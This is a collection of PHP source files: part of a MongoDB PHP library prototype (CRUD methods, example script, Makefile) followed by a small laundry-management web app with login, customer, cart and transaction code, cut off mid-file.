* @see http://docs.mongodb.org/manual/reference/command/insert/
*
* @param array[]|object[] $documents The documents to insert
* @return InsertManyResult
*/
public function insertMany(array $documents)
{
    /* Queue every document into a single BulkWrite and execute it once.
     * Returns an InsertManyResult mapping each input index to its _id. */
    $options = $this->getWriteOptions(); // array_merge() with a single argument was a no-op
    $bulk = new BulkWrite($options["ordered"]);

    $insertedIds = array();
    foreach ($documents as $i => $document) {
        $insertedId = $bulk->insert($document);
        if ($insertedId !== null) {
            // The driver generated an ObjectID for this document.
            $insertedIds[$i] = $insertedId;
        } else {
            // The document supplied its own _id; echo it back to the caller.
            $insertedIds[$i] = is_array($document) ? $document['_id'] : $document->_id;
        }
    }

    $writeResult = $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
    return new InsertManyResult($writeResult, $insertedIds);
}
/**
* Inserts the provided document
*
* @see http://docs.mongodb.org/manual/reference/command/insert/
*
* @param array|object $document The document to insert
* @return InsertOneResult
*/
public function insertOne($document)
{
    /* Insert a single document and return an InsertOneResult carrying its _id. */
    $options = $this->getWriteOptions(); // array_merge() with a single argument was a no-op
    $bulk = new BulkWrite($options["ordered"]);
    $id = $bulk->insert($document);
    $wr = $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
    if ($id === null) {
        // The document supplied its own _id; report that one.
        $id = is_array($document) ? $document['_id'] : $document->_id;
    }
    return new InsertOneResult($wr, $id);
}
/**
* Returns information for all indexes for the collection.
*
* @see http://docs.mongodb.org/manual/reference/command/listIndexes/
* @see http://docs.mongodb.org/manual/reference/method/db.collection.getIndexes/
* @return IndexInfoIterator
*/
public function listIndexes()
{
    // Index listing always runs against the primary.
    $server = $this->manager->selectServer(new ReadPreference(ReadPreference::RP_PRIMARY));

    // Prefer the listIndexes command when the server supports it.
    if (FeatureDetection::isSupported($server, FeatureDetection::API_LISTINDEXES_CMD)) {
        return $this->listIndexesCommand($server);
    }
    return $this->listIndexesLegacy($server);
}
/**
* Replace one document
*
* @see http://docs.mongodb.org/manual/reference/command/update/
* @see Collection::getWriteOptions() for supported $options
*
* @param array $filter The query criteria selecting the document to replace
* @param array $update The document to replace with
* @param array $options Additional options
* @return UpdateResult
*/
public function replaceOne(array $filter, array $update, array $options = array())
{
    // A replacement document must not start with an update operator.
    $firstKey = key($update);
    if (isset($firstKey[0]) && $firstKey[0] == '$') {
        throw new InvalidArgumentException("First key in \$update must NOT be a \$operator");
    }
    $writeResult = $this->_update($filter, $update, $options + array("multi" => false));
    return new UpdateResult($writeResult);
}
/**
* Update all documents matching the filter
* NOTE: Will update ALL documents matching $filter
*
* @see http://docs.mongodb.org/manual/reference/command/update/
* @see Collection::getWriteOptions() for supported $options
*
* @param array $filter The query criteria selecting the documents to update
* @param array $update An array of update operators to apply to the document
* @param array $options Additional options
* @return UpdateResult
*/
public function updateMany(array $filter, $update, array $options = array())
{
    // Force multi-document mode unless the caller explicitly set "multi".
    $writeResult = $this->_update($filter, $update, $options + array("multi" => true));
    return new UpdateResult($writeResult);
}
/**
* Update one document
* NOTE: Will update at most ONE document matching $filter
*
* @see http://docs.mongodb.org/manual/reference/command/update/
* @see Collection::getWriteOptions() for supported $options
*
* @param array $filter The query criteria selecting the document to update
* @param array $update An array of update operators to apply to the document
* @param array $options Additional options
* @return UpdateResult
*/
public function updateOne(array $filter, array $update, array $options = array())
{
    // updateOne only accepts update-operator documents (e.g. ['$set' => ...]).
    $firstKey = key($update);
    $isOperator = isset($firstKey[0]) && $firstKey[0] == '$';
    if (!$isOperator) {
        throw new InvalidArgumentException("First key in \$update must be a \$operator");
    }
    $writeResult = $this->_update($filter, $update, $options + array("multi" => false));
    return new UpdateResult($writeResult);
}
/**
* Helper to build a Query object
*
* @param array $filter the query document
* @param array $options query/protocol options
* @return Query
* @internal
*/
final protected function _buildQuery($filter, $options)
{
    // Fold helper-level options into wire-protocol query modifiers.
    if ($options["comment"]) {
        $options["modifiers"]['$comment'] = $options["comment"];
    }
    if ($options["maxTimeMS"]) {
        $options["modifiers"]['$maxTimeMS'] = $options["maxTimeMS"];
    }
    if ($options["sort"]) {
        // NOTE(review): unlike comment/maxTimeMS above, sort is written to
        // top-level $options['$orderby'] rather than into "modifiers" —
        // confirm this is what the Query constructor expects.
        $options['$orderby'] = $options["sort"];
    }
    // Translate cursor-related options into OP_QUERY wire-protocol flag bits.
    $flags = $this->_opQueryFlags($options);
    $options["cursorFlags"] = $flags;
    $query = new Query($filter, $options);
    return $query;
}
/**
* Internal helper for delete one/many documents
* @internal
*/
final protected function _delete($filter, $limit = 1)
{
    // limit=1 removes a single matching document; limit=0 removes every match.
    $options = array("limit" => $limit) + $this->getWriteOptions();
    $bulk = new BulkWrite($options["ordered"]);
    $bulk->delete($filter, $options);
    return $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
}
/**
* Internal helper for throwing an exception with error message
* @internal
*/
final protected function _generateCommandException($doc)
{
    // Build a RuntimeException from a failed command response document.
    if (isset($doc["errmsg"]) && $doc["errmsg"]) {
        return new RuntimeException($doc["errmsg"]);
    }
    // No server-provided message; embed the raw response in the message
    // instead of the previous var_dump() call, which wrote debugging
    // output to stdout from library code.
    return new RuntimeException("FIXME: Unknown error: " . json_encode($doc));
}
/**
* Internal helper for massaging aggregate options
* @internal
*/
protected function _massageAggregateOptions($options)
{
    // When a cursor was requested, translate batchSize into the command's
    // cursor subdocument; an empty subdocument selects server defaults.
    if (!empty($options["useCursor"])) {
        if (isset($options["batchSize"])) {
            $options["cursor"] = array("batchSize" => (integer) $options["batchSize"]);
        } else {
            $options["cursor"] = new stdClass;
        }
    }
    // These two are helper-level options, not part of the aggregate command.
    unset($options["useCursor"], $options["batchSize"]);
    return $options;
}
/**
* Internal helper for massaging findandmodify options
* @internal
*/
final protected function _massageFindAndModifyOptions($options, $update = array())
{
    // Translate helper-level options into findAndModify command fields.
    // Every lookup is guarded with isset() for consistency: "sort" and
    // "projection" were previously read unconditionally, raising notices
    // when a caller omitted them.
    $ret = array(
        "sort"   => isset($options["sort"]) ? $options["sort"] : null,
        "new"    => isset($options["returnDocument"]) ? $options["returnDocument"] == self::FIND_ONE_AND_RETURN_AFTER : false,
        "fields" => isset($options["projection"]) ? $options["projection"] : null,
        "upsert" => isset($options["upsert"]) ? $options["upsert"] : false,
    );
    // An empty $update means this is a delete-style findAndModify.
    if ($update) {
        $ret["update"] = $update;
    } else {
        $ret["remove"] = true;
    }
    return $ret;
}
/**
* Internal helper for massaging the findAndModify result.
*
* @internal
* @param array $result
* @param array $options
* @return array|null
*/
final protected function _massageFindAndModifyResult(array $result, array $options)
{
    // No document matched (or there was nothing to return): report null.
    if ($result['value'] === null) {
        return null;
    }
    /* Prior to 3.0, findAndModify returns an empty document instead of null
     * when an upsert is performed and the pre-modified document was
     * requested.
     */
    if ($options['upsert'] && ! $options['new'] &&
        isset($result['lastErrorObject']->updatedExisting) &&
        ! $result['lastErrorObject']->updatedExisting) {
        return null;
    }
    // Normalize the returned document to an array for a consistent API.
    return is_object($result["value"])
        ? (array) $result['value']
        : $result['value'];
}
/**
* Constructs the Query Wire Protocol field 'flags' based on $options
* provided to other helpers
*
* @param array $options
* @return integer OP_QUERY Wire Protocol flags
* @internal
*/
final protected function _opQueryFlags($options)
{
    // OR together the OP_QUERY wire-protocol flag bits implied by $options.
    $flags = 0;
    $flags |= $options["allowPartialResults"] ? self::QUERY_FLAG_PARTIAL : 0;
    // cursorType values are defined as the corresponding flag bits.
    $flags |= $options["cursorType"] ? $options["cursorType"] : 0;
    // NOTE: the constant name has a typo ("REPLY" vs "REPLAY"); kept as declared.
    $flags |= $options["oplogReplay"] ? self::QUERY_FLAG_OPLOG_REPLY: 0;
    $flags |= $options["noCursorTimeout"] ? self::QUERY_FLAG_NO_CURSOR_TIMEOUT : 0;
    return $flags;
}
/**
* Internal helper for running a command
* @internal
*/
final protected function _runCommand($dbname, array $cmd, ReadPreference $rp = null)
{
    // Thin wrapper: wrap the command array and dispatch through the manager.
    return $this->manager->executeCommand($dbname, new Command($cmd), $rp);
}
/**
* Internal helper for replacing/updating one/many documents
* @internal
*/
protected function _update($filter, $update, $options)
{
    // Shared implementation behind updateOne/updateMany/replaceOne.
    $merged = array_merge($this->getWriteOptions(), $options);
    $bulk = new BulkWrite($merged["ordered"]);
    $bulk->update($filter, $update, $merged);
    return $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
}
/**
* Create one or more indexes for the collection using the createIndexes
* command.
*
* @param Server $server
* @param IndexInput[] $indexes
* @return string[] The names of the created indexes
*/
private function createIndexesCommand(Server $server, array $indexes)
{
    // Issue a single createIndexes command covering every requested index.
    $command = new Command(array(
        'createIndexes' => $this->collname,
        'indexes'       => $indexes,
    ));
    $server->executeCommand($this->dbname, $command);

    // Each IndexInput stringifies to its generated index name.
    return array_map(function (IndexInput $index) {
        return (string) $index;
    }, $indexes);
}
/**
* Create one or more indexes for the collection by inserting into the
* "system.indexes" collection (MongoDB <2.6).
*
* @param Server $server
* @param IndexInput[] $indexes
* @return string[] The names of the created indexes
*/
private function createIndexesLegacy(Server $server, array $indexes)
{
    // Pre-2.6 servers create indexes via inserts into "system.indexes".
    $bulk = new BulkWrite(true);
    foreach ($indexes as $index) {
        // TODO: Remove this once PHPC-274 is resolved (see: PHPLIB-87)
        $bulk->insert($index->bsonSerialize());
    }
    $server->executeBulkWrite($this->dbname . '.system.indexes', $bulk);
    // Each IndexInput stringifies to its generated index name.
    return array_map(function(IndexInput $index) { return (string) $index; }, $indexes);
}
/**
* Returns information for all indexes for this collection using the
* listIndexes command.
*
* @see http://docs.mongodb.org/manual/reference/command/listIndexes/
* @param Server $server
* @return IndexInfoIteratorIterator
*/
private function listIndexesCommand(Server $server)
{
    // Modern servers expose index metadata through the listIndexes command.
    $command = new Command(array('listIndexes' => $this->collname));
    $cursor = $server->executeCommand($this->dbname, $command);
    // Decode documents as PHP arrays for the iterator wrapper.
    $cursor->setTypeMap(array('document' => 'array'));
    return new IndexInfoIteratorIterator($cursor);
}
/**
* Returns information for all indexes for this collection by querying the
* "system.indexes" collection (MongoDB <2.8).
*
* @param Server $server
* @return IndexInfoIteratorIterator
*/
private function listIndexesLegacy(Server $server)
{
    // Pre-2.8 servers: read index metadata straight from "system.indexes".
    $cursor = $server->executeQuery(
        $this->dbname . '.system.indexes',
        new Query(array('ns' => $this->ns))
    );
    // Decode documents as PHP arrays for the iterator wrapper.
    $cursor->setTypeMap(array('document' => 'array'));
    return new IndexInfoIteratorIterator($cursor);
}
}
<file_sep><?php
namespace MongoDB\Exception;
/**
 * Thrown when a value does not match an expected set of values, e.g. an
 * unexpected server response. Implements the library-wide marker interface
 * so callers can catch MongoDB\Exception\Exception generically.
 */
class UnexpectedValueException extends \UnexpectedValueException implements Exception
{
}
<file_sep><?php
// Manual bootstrap for the example: pull in the prototype library sources.
require __DIR__ . "/../src/QueryFlags.php";
require __DIR__ . "/../src/CursorType.php";
require __DIR__ . "/../src/InsertResult.php";
require __DIR__ . "/../src/DeleteResult.php";
require __DIR__ . "/../src/UpdateResult.php";
require __DIR__ . "/../src/Collection.php";
// Connect to a local mongod and work in the "crud.examples" namespace.
$manager = new MongoDB\Manager("mongodb://localhost:27017");
$collection = new MongoDB\Collection($manager, "crud.examples");
// Fixture documents used throughout the CRUD walkthrough below.
$hannes = array(
"name" => "Hannes",
"nick" => "bjori",
"citizen" => "Iceland",
);
$hayley = array(
"name" => "Hayley",
"nick" => "Ninja",
"citizen" => "USA",
);
$bobby = array(
"name" => "<NAME>",
"nick" => "<NAME>",
"citizen" => "USA",
);
$kasparov = array(
"name" => "<NAME>",
"nick" => "Kasparov",
"citizen" => "Russia",
);
$spassky = array(
"name" => "<NAME>",
"nick" => "Spassky",
"citizen" => "France",
);
// insertOne / count / updateOne / find walkthrough.
try {
$result = $collection->insertOne($hannes);
printf("Inserted _id: %s\n", $result->getInsertedId());
$result = $collection->insertOne($hayley);
printf("Inserted _id: %s\n", $result->getInsertedId());
$result = $collection->insertOne($bobby);
printf("Inserted _id: %s\n", $result->getInsertedId());
$count = $collection->count(array("nick" => "bjori"));
printf("Searching for nick => bjori, should have only one result: %d\n", $count);
$result = $collection->updateOne(
array("citizen" => "USA"),
array('$set' => array("citizen" => "Iceland"))
);
printf("Updated: %s (out of expected 1)\n", $result->getModifiedCount());
$result = $collection->find(array("citizen" => "Iceland"), array("comment" => "Excellent query"));
echo "Searching for citizen => Iceland, verify Hayley is now Icelandic\n";
foreach($result as $document) {
var_dump($document);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
// find() / distinct() / aggregate() walkthrough.
try {
$result = $collection->find();
echo "Find all docs, should be 3, verify 1x USA citizen, 2x Icelandic\n";
foreach($result as $document) {
var_dump($document);
}
$result = $collection->distinct("citizen");
echo "Distinct countries:\n";
var_dump($result);
echo "aggregate\n";
$aggregate = $collection->aggregate(array(array('$project' => array("name" => 1, "_id" => 0))), array("useCursor" => true, "batchSize" => 2));
printf("Should be 3 different people\n");
foreach($aggregate as $person) {
var_dump($person);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
// updateMany walkthrough.
try {
$result = $collection->updateMany(
array("citizen" => "Iceland"),
array('$set' => array("viking" => true))
);
printf("Updated: %d (out of expected 2), verify Icelandic people are vikings\n", $result->getModifiedCount());
$result = $collection->find();
foreach($result as $document) {
var_dump($document);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
// replaceOne walkthrough.
try {
echo "This is the trouble maker\n";
$result = $collection->replaceOne(
array("nick" => "<NAME>"),
array("name" => "<NAME>", "nick" => "unknown", "citizen" => "Norway")
);
printf("Replaced: %d (out of expected 1), verify Bobby has been replaced with Magnus\n", $result->getModifiedCount());
$result = $collection->find();
foreach($result as $document) {
var_dump($document);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
// deleteOne / deleteMany walkthrough.
// NOTE(review): $document here is whatever the previous foreach left behind —
// works in this demo, but fragile if the blocks above are reordered.
try {
$result = $collection->deleteOne($document);
printf("Deleted: %d (out of expected 1)\n", $result->getDeletedCount());
$result = $collection->deleteMany(array("citizen" => "Iceland"));
printf("Deleted: %d (out of expected 2)\n", $result->getDeletedCount());
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
// findOneAndReplace / findOneAndUpdate / findOneAndDelete walkthrough.
try {
echo "FindOneAndReplace\n";
$result = $collection->findOneAndReplace($spassky, $kasparov, array("upsert" => true));
echo "Kasparov\n";
var_dump($result);
echo "Returning the old document where he was Russian\n";
$result = $collection->findOneAndUpdate($kasparov, array('$set' => array("citizen" => "Croatia")));
var_dump($result);
echo "Deleting him, he isn't Croatian just yet\n";
$result = $collection->findOneAndDelete(array("citizen" => "Croatia"));
var_dump($result);
echo "This should be empty\n";
$result = $collection->find(array());
foreach($result as $document) {
var_dump($document);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
// bulkWrite walkthrough mixing all five operation types in one batch.
try {
$result = $collection->bulkWrite(
// Required writes param (an array of operations)
[
// Like explain(), operations identified by single key
[
'insertOne' => [
['x' => 1]
],
],
[
'updateMany' => [
['x' => 1],
['$set' => ['x' => 2]],
],
],
[
'updateOne' => [
['x' => 3],
['$set' => ['x' => 4]],
// Optional params are still permitted
['upsert' => true],
],
],
[
'deleteOne' => [
['x' => 1],
],
],
[
'deleteMany' => [
// Required arguments must still be specified
[],
],
],
],
// Optional named params in an associative array
['ordered' => false]
);
printf("insertedCount: %d\n", $result->getInsertedCount());
printf("matchedCount: %d\n", $result->getMatchedCount());
printf("modifiedCount: %d\n", $result->getModifiedCount());
printf("upsertedCount: %d\n", $result->getUpsertedCount());
printf("deletedCount: %d\n", $result->getDeletedCount());
foreach ($result->getUpsertedIds() as $index => $id) {
printf("upsertedId[%d]: %s", $index, $id);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
echo $e->getTraceAsString(), "\n";
exit;
}
<file_sep>.PHONY: apigen composer test docs mkdocs
MONGODB_LIB_VERSION=`php -r 'require "src/Collection.php"; echo MongoDB\Collection::VERSION, "\n";'`
COMPOSER_ARGS=update --no-interaction --prefer-source
PHPUNIT_ARGS=--process-isolation

composer:
	@command -v composer >/dev/null 2>&1; \
	if test $$? -eq 0; then \
		composer $(COMPOSER_ARGS); \
	elif test -r composer.phar; then \
		php composer.phar $(COMPOSER_ARGS); \
	else \
		echo "Cannot find composer :("; \
		echo "Aborting."; \
		exit 1; \
	fi

test: composer
	@command -v phpunit >/dev/null 2>&1; \
	if test $$? -eq 0; then \
		phpunit $(PHPUNIT_ARGS); \
	elif test -r phpunit.phar; then \
		php phpunit.phar $(PHPUNIT_ARGS); \
	else \
		echo "Cannot find phpunit :("; \
		echo "Aborting."; \
		exit 1; \
	fi

# Fixed: the apigen and mkdocs recipes were missing ";"/"\" line
# continuations, which made the multi-line shell "if" a syntax error.
apigen:
	@command -v apigen >/dev/null 2>&1; \
	if test $$? -eq 0; then \
		apigen generate; \
	elif test -r apigen.phar; then \
		php apigen.phar generate; \
	else \
		echo "Cannot find apigen :("; \
		echo "Aborting."; \
		exit 1; \
	fi

mkdocs:
	@command -v mkdocs >/dev/null 2>&1; \
	if test $$? -eq 0; then \
		mkdocs build --clean; \
	else \
		echo "Cannot find mkdocs :("; \
		echo "Aborting."; \
		exit 1; \
	fi

docs-api: apigen

# Single canonical docs target; a duplicate "docs:" recipe previously
# shadowed this one and triggered make's "overriding recipe" warning.
docs: mkdocs

release: test RELEASE
	@echo "Please run:"
	@echo " " git add RELEASE-$(MONGODB_LIB_VERSION)
	@echo " " git commit -m \"Add $(MONGODB_LIB_VERSION) release notes\"
	@echo " " git tag -a -m \"Release MongoDB library $(MONGODB_LIB_VERSION)\" $(MONGODB_LIB_VERSION)
	@echo " " git push --tags
	@echo " " make release-docs
	@echo "And don't forget to bump version in src/Collection.php"

release-docs: docs
	mkdocs gh-deploy --clean

RELEASE:
	@git log --pretty=format:"%ad %an <%ae>%n%x09* %s%n" --date short --since="$$(git show -s --format=%ad `git rev-list --tags --max-count=1`)" > RELEASE-$(MONGODB_LIB_VERSION)
<file_sep><?php
namespace MongoDB\Exception;
/**
 * Thrown when a caller passes an argument the library cannot accept
 * (e.g. a replacement document containing update operators). Implements
 * the library-wide marker interface for generic catching.
 */
class InvalidArgumentException extends \InvalidArgumentException implements Exception
{
}
<file_sep><?php
namespace MongoDB\Exception;
/**
 * Marker interface implemented by every exception thrown by this library,
 * allowing callers to catch MongoDB\Exception\Exception generically.
 */
interface Exception
{
}
| 2dbb3e8320521c0dcd54ec6937c397941fcc95b6 | [
"Markdown",
"Makefile",
"PHP"
] | 9 | PHP | jaleelzhang/mongo-php-library-prototype | 8665a88962f989d3aa3412b4a196092d32d64f62 | 4e6a81b45fa163ee415c08129b1949b2fd2e815e |
refs/heads/master | <repo_name>alaraiabdiallah/tubes_rpl<file_sep>/src/konsumen.php
<?php
// CRUD controller logic for "konsumen" (customers); included by konsumen.php.
// Requires an authenticated session; all values are escaped before
// interpolation into SQL.
redirectWhenGuest('login.php');
$konsumen = [];
$konsumenQuery = $db->query("SELECT * FROM konsumen ;");
while($r = $konsumenQuery->fetch_object())
$konsumen[] = $r;
$nama = $db->escape_string(postReq('nama'));
$no_hp = $db->escape_string(postReq('no_hp'));
if(isEdit()){
$id = $db->escape_string(getReq('id'));
// NOTE(review): $konsumen is reused here as a single row object,
// shadowing the list loaded above.
$konsumen = $db->query("SELECT * FROM konsumen WHERE id = '$id';")->fetch_object();
$nama = $db->escape_string(postReq('nama',$konsumen->nama));
$no_hp = $db->escape_string(postReq('no_hp',$konsumen->no_hp));
}
if(isDelete()){
$id = $db->escape_string(getReq('id'));
$db->query("DELETE FROM konsumen WHERE id = '$id';");
header('location: konsumen.php');
}
if(isButtonSubmit()){
if(isEdit())
$db->query("UPDATE konsumen SET nama = '$nama', no_hp = '$no_hp' WHERE id = '$id';");
if(isAdd())
$db->query("INSERT konsumen(nama, no_hp) VALUES('$nama','$no_hp');");
header('location: konsumen.php');
}
?>
<?php
// Front controller for the "pegawai" (employee) module:
// add/edit requests render the form view, everything else the list view.
require_once "lib/bootstrap.php";
require_once "src/pegawai.php";
if(isAdd() || isEdit())
require_once "views/form_pegawai.php";
else
require_once "views/pegawai.php";
?>
<?php
// Authentication handler: validates the submitted credentials and stores
// the matching pegawai record in the session.
require_once "lib/bootstrap.php";
redirectWhenAuthenticated("index.php");
if(isButtonSubmit()){
try{
$username = $db->escape_string(postReq('username'));
// NOTE(review): passwords are compared in plain text against the DB;
// consider password_hash()/password_verify() (requires a data migration).
$password = $db->escape_string(postReq('password'));
$query = $db->query("SELECT * FROM user_login INNER JOIN pegawai ON user_login.pegawai_id = pegawai.id WHERE username = '$username' AND password = '$<PASSWORD>' ");
$result = $query->fetch_object();
if($query->num_rows != 1)
throw new Exception("Username dan password salah");
setUser($result);
// Send the user back to the originally requested page, if any.
// NOTE(review): $_GET['from'] is used unvalidated — possible open redirect.
$redirect = isset($_GET['from']) ? $_GET['from'] : "index.php";
header("location: $redirect");
}catch(Exception $e){
$errors['auth'] = $e->getMessage();
}
}
?>
<?php require_once "partials/header.php" ?>
<?php /* Centered login card; the form posts back to the current URL. */ ?>
<div class="col-4" style="margin: 10% auto;">
<div class="card">
<div class="card-body">
<h3 class="text-center">Login your account</h3>
<hr>
<form action="<?php echo getCurrentUrl() ?>" method="POST">
<div class="form-group">
<label for="username">Username</label>
<input type="text" required class="form-control" name="username" id="username" aria-describedby="username" placeholder="Your username">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Password</label>
<input type="<PASSWORD>" required class="form-control" name="password" id="password" placeholder="*******">
</div>
<button type="submit" name="submit" class="btn btn-primary">Login</button>
</form>
<hr>
</div>
</div>
</div>
<?php require_once "partials/footer.php" ?>
<?php
// Front controller for login: src handles the POST, view renders the form.
require_once "src/login.php";
require_once "views/login.php";
?>
<?php
// Front controller for the dashboard/home page.
require_once "lib/bootstrap.php";
require_once "src/home.php";
require_once "views/home.php";
?>
<?php
// Database bootstrap: connection settings and generic mysqli CRUD helpers.
// NOTE(review): credentials are hard-coded; consider moving to config/env.
$servername = "localhost";
$username = "root";
$password = "";
$dbname = "rpl_laundry";
$db = new mysqli($servername,$username,$password,$dbname);
function fetchToArray($query){
    // Collect every row of a mysqli result set into a plain array of objects.
    $rows = [];
    while (($row = $query->fetch_object()) !== null) {
        $rows[] = $row;
    }
    return $rows;
}
function DBInsert($db,$data, $table, $except = 'id'){
// Build and run an INSERT from an associative array, skipping $except
// (usually the auto-increment primary key). Values are escaped with
// escape_string(); $table and the column NAMES are interpolated raw,
// so they must never come from user input.
$columns = [];
$values = [];
foreach($data as $column => $value){
if($column == $except) continue;
$columns[] = $column;
$values[] = "'".$db->escape_string($value)."'";
}
$sql = "INSERT INTO $table(". implode(',',$columns) .") VALUES (".implode(',',$values).");";
$query = $db->query($sql);
return $query;
}
function DBUpdate($db,$data, $table, $primaryKey = 'id'){
    // Build and run an UPDATE from an associative array; $primaryKey selects
    // the row and is excluded from the SET list. $table and column names are
    // interpolated raw and must never come from user input.
    $assignments = [];
    foreach ($data as $column => $value) {
        if ($column == $primaryKey) continue;
        $assignments[] = $column . "='" . $db->escape_string($value) . "'";
    }
    // Escape the key value as well: it was previously interpolated raw,
    // which allowed SQL injection through $data[$primaryKey].
    $keyValue = $db->escape_string($data[$primaryKey]);
    $sql = "UPDATE $table SET " . implode(',', $assignments) . " WHERE $primaryKey = '$keyValue';";
    return $db->query($sql);
}
function DBDelete($db, $value, $table, $primaryKey = 'id'){
    // Delete rows whose $primaryKey equals $value (the value is escaped;
    // $table/$primaryKey are interpolated raw and must be trusted).
    $escaped = $db->escape_string($value);
    $sql = "DELETE FROM $table WHERE $primaryKey = '$escaped';";
    return $db->query($sql);
}
<?php
require_once "lib/bootstrap.php";

// AJAX endpoint: look up a single "layanan" (service) row by id and
// return it as JSON for the transaction form (assets/js/main.js).
$id = $db->escape_string(getReq("id")); // was interpolated raw: SQL injection fix
$queryLayanan = $db->query("SELECT * FROM layanan WHERE id='$id' ");
$row = $queryLayanan ? $queryLayanan->fetch_object() : null;

header('Content-Type: application/json');

// Previously a missing row caused property access on null; answer 404 instead.
if ($row === null) {
    http_response_code(404);
    echo json_encode(["error" => "layanan not found"]);
    exit;
}

echo json_encode([
    "id" => $row->id,
    "nama" => $row->nama,
    "harga" => $row->harga,
    "satuan" => $row->satuan,
]);
?>
<?php
// Home view: standard two-column layout (sidebar menu + content area).
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
Beranda
</div>
</div>
</div>
<?php require_once "partials/footer.php"; ?>
<?php
$_SESSION['carts'] = $_SESSION['carts'] ?? [];
function isCartItemExists($id){
    // True when any session-cart entry carries the given id.
    foreach ($_SESSION['carts'] as $item) {
        if (!empty($item['id']) && $item['id'] == $id) {
            return true;
        }
    }
    return false;
}
function searchCartItemById($id){
    // Return the array KEY of the cart entry with the given id, or null.
    // Previously this returned a positional counter, which diverged from
    // the real keys once deleteCartItem() unset an element, making
    // getCart()/updateCartQty() operate on the wrong (or missing) entry.
    foreach ($_SESSION['carts'] as $key => $cart) {
        if (!empty($cart['id']) && $cart['id'] == $id) {
            return $key;
        }
    }
    return null;
}
function getCart($id){
    // Fetch the cart entry matching $id via its array key.
    $key = searchCartItemById($id);
    return $_SESSION['carts'][$key];
}
function updateCartQty($id,$qty){
    // Overwrite the quantity of the cart entry identified by $id.
    $key = searchCartItemById($id);
    $_SESSION['carts'][$key]['qty'] = $qty;
}
function deleteCartItem($id){
    // Remove the entry; note unset() leaves a gap in the numeric keys.
    $key = searchCartItemById($id);
    unset($_SESSION['carts'][$key]);
}
function addCartItem($data){
    // Append a new line item to the session cart.
    $_SESSION['carts'][] = $data;
}
function getCarts(){
// Return the full list of cart line items from the session.
return $_SESSION['carts'];
}
function cartsTotal(){
    // Sum of price * qty across every cart line.
    $sum = 0;
    foreach ($_SESSION['carts'] as $line) {
        $sum += $line['qty'] * $line['price'];
    }
    return $sum;
}
<?php
// Customer list view. DB-sourced values are HTML-escaped (htmlspecialchars)
// and URL-encoded (urlencode) to prevent stored XSS — previously they were
// echoed raw into markup and href attributes.
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
<div class="pull-right space-bottom">
<a class="btn btn-primary" href="?action=add" role="button"><i class="fa fa-plus"></i></a>
</div>
<table class="table">
<thead>
<tr>
<th>No</th>
<th>Nama</th>
<th>No HP</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php $i = 1; foreach($konsumen as $r): ?>
<tr>
<td scope="row"><?php echo $i++; ?></td>
<td><?php echo htmlspecialchars($r->nama); ?></td>
<td><?php echo htmlspecialchars($r->no_hp); ?></td>
<td>
<a class="btn btn-primary btn-sm" href="?id=<?php echo urlencode($r->id) ?>&action=edit" role="button"><i class="fa fa-edit"></i> Edit</a>
<a class="btn btn-danger btn-sm" href="?id=<?php echo urlencode($r->id) ?>&action=delete" role="button" onclick="return confirm('Yakin akan menghapus data ini?')"><i class="fa fa-trash"></i> Delete</a>
</td>
</tr>
<?php endforeach ?>
</tbody>
</table>
</div>
</div>
</div>
<?php require_once "partials/footer.php"; ?>
<?php
function getCurrentUrl(){
    // Reconstruct the absolute URL of the current request from server vars.
    $isHttps = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on';
    $scheme = $isHttps ? "https" : "http";
    return $scheme . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
}
function currScript(){
    // Basename of the executing script, e.g. "login.php".
    // basename() replaces the manual explode()/count() dance.
    return basename($_SERVER['SCRIPT_NAME']);
}
?><file_sep>/transaksi.php
<?php
// Front controller for transactions: add -> creation form,
// edit -> status/pickup form, otherwise the transaction list.
require_once "lib/bootstrap.php";
require_once "src/transaksi.php";
if(isAdd())
require_once "views/form_transaksi.php";
else if(isEdit())
require_once "views/form_edit_transaksi.php";
else
require_once "views/transaksi.php";
?>
<?php
// Transaction controller: loads lookup data, handles edit (status/pickup
// date) and add (new transaction + detail rows inside a DB transaction).
redirectWhenGuest('login.php');
$transaksi = [];
$transaksiQuery = $db->query("SELECT * FROM transaksi ;");
while($r = $transaksiQuery->fetch_object())$transaksi[] = $r;
$konsumen = [];
$konsumenQuery = $db->query("SELECT * FROM konsumen ;");
while($r = $konsumenQuery->fetch_object())$konsumen[] = $r;
$layanan = [];
$layananQuery = $db->query("SELECT * FROM layanan ;");
while($r = $layananQuery->fetch_object()) $layanan[] = $r;
// Template row for the dynamic details form (see assets/js/main.js).
$default_details = [
[
"layanan_id" => "",
"satuan" => "",
"harga" => "",
"jumlah" => 0
],
];
$pegawai_id = getUserInfo("pegawai_id");
$konsumen_id = $db->escape_string(postReq("konsumen_id"));
$tanggal_transaksi = $db->escape_string(postReq('tanggal_transaksi',date('Y-m-d')));
$details = postReq('details',$default_details);
if(isEdit()){
$id = $db->escape_string(getReq('id'));
$transaksi = $db->query("SELECT * FROM transaksi WHERE kode_transaksi = '$id';")->fetch_object();
